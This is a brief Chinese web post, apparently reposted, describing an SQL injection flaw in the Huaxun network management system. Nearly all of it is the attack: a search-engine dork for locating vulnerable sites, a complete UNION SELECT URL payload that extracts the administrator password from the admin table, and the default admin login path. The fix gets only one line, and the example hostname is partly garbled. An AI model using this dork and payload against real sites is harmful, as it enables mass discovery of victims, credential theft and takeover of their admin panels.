华讯网络管理系统存在SQL注入,可获取管理员用户密码信息。
关键字:inurl:chk_case.asp
漏洞 测试: asp ?ID=673%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,">http://HdhCmsTestsite测试数据/chk_case.asp?ID=673%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,admin,16,17,18,19,20,
userpassword,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41%20from%20admin
默认后台: http://HdhCmsTestsite测试数据/admin/
修复:
过滤 chk_case.asp页面,修改后台路径
查看更多关于华讯网络管理系统注入漏洞利用及修复 - 网站安的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11125